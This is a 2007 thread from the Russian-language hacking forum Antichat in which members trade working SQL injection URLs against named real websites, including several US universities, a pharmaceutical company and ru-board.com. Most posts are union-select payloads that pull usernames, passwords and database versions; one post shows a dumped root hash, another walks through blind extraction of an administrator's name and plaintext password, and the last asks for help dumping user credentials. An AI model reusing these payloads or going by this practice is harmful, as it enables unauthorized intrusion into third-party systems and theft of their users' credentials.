HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.05.2007, 19:16
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
По умолчанию

Код:
http://iwf.ru/main/top.php?id=-2+union+select+1,2,concat(username,char(58),password),4+from+users+where+user_id=1/*
 
Ответить с цитированием

  #2  
Старый 27.05.2007, 19:25
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Парк активного отдыха "Якутские горы"
Цитата:
http://www.yago.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3 a,database(),0x3a,version()),11,12/*&show=8
з.ы. антибоян кто-нибудь обновляет вообще??
 
Ответить с цитированием

  #3  
Старый 27.05.2007, 19:31
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Антибоян обновляеться раз в 14 дней

Заодно несколько иньекций
Код:
http://www.ardi.ee/lanordia/index.php?id=-10+union+select+1,concat(login,char(58),password)+from+users/*
Код:
http://www.ivek.ee/news/news.php?mode=normal&id=-127+union+select+1,concat(login,char(58),password),3,4+from+users/*&lang=est
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 27.05.2007 в 21:35..
 
Ответить с цитированием

  #4  
Старый 28.05.2007, 00:40
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

TOP 10 [SQL INJ] edu! for KPOT_f1nd

Код:
http://www.chemistry.montana.edu/news.php?id=19+union+select+1,2,3,4,5,6,7/*

http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,concat(user(),char(58),version()),4,5,6,7,8/*

http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*

http://www2.umaine.edu/graduate/news.php?id=19'+union+select+1,concat(user(),char(58),version()),3,4/*

http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

http://www.physics.hmc.edu/news.php?id=21+union+select+1,2,3,4,5/*

http://www.csun.edu/~humndean/cgi-bin/news.php?id=-118+union+select+1,2,concat(user(),char(58),version()),4,5/*

http://acd.edu/news.php?id=5'+union+select+1,2,3,4,5/*

http://www.informatics.indiana.edu/news/news.asp?id=-156+union+select+1,concat(user(),char(58),version()),3,4,5,6/*

http://www.bellarmine.edu/athletics/news.asp?id=1 or 1=@@version--
 
Ответить с цитированием

  #5  
Старый 28.05.2007, 00:45
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://live.ece.utexas.edu/People/people_detail.php?id=-97+union+select+1,database(),3,version(),password,user,7,user(),9,10,11,12+from+mysql.user/*
root:327cc28f2c9db092
me lost :[
 
Ответить с цитированием

  #6  
Старый 28.05.2007, 03:18
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


По умолчанию

Код:
http://ru-board.com/new/categories.php?op=newindex&catid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Вывода нет. Возможно, в каком то поле хранится ссылка на файл со статьей...
Код:
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring(version(),1,1)))=0x34/*
MySQL 4.x
 
Ответить с цитированием

  #7  
Старый 28.05.2007, 04:33
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


По умолчанию

Вот немного покопался глубже:

Код:
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),1,1)))=103/*
g
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),2,1)))=111/*
o
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),3,1)))=100/*
d
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+name+from+nuke_authors+where+radminsuper=1+limit+1),4,1)))=0/*

user: god

http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),1,1)))=102/*
f
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),2,1)))=114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),3,1)))=101/*
e
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),4,1)))=52/*
4
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),5,1)))=53/*
5
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),6,1)))=116/*
t
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),7,1)))=114/*
r
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),8,1)))=115/*
s
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),9,1)))=119/*
w
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),10,1)))=51/*
3
http://ru-board.com/new/categories.php?op=newindex&catid=3'+and+ascii(lower(substring((select+pwd+from+nuke_authors+where+radminsuper=1+limit+1),11,1)))=0/*

password: fre45trsw3
 
Ответить с цитированием

  #8  
Старый 28.05.2007, 11:32
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Код:
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

Последний раз редактировалось _Pantera_; 28.05.2007 в 11:44..
 
Ответить с цитированием

  #9  
Старый 28.05.2007, 13:23
Boccob
Познающий
Регистрация: 04.05.2007
Сообщений: 38
Провел на форуме:
939769

Репутация: 59
По умолчанию

Pharmacheutical company
Цитата:
http://www.medochemie.com/products.php?by=category&id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5/*
 
Ответить с цитированием

  #10  
Старый 28.05.2007, 14:00
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
По умолчанию

Поля подобрал
http://www.eepublishers.co.za/view.php?sid=-8036+union+select+null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null/*
помогите вывести user u password
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.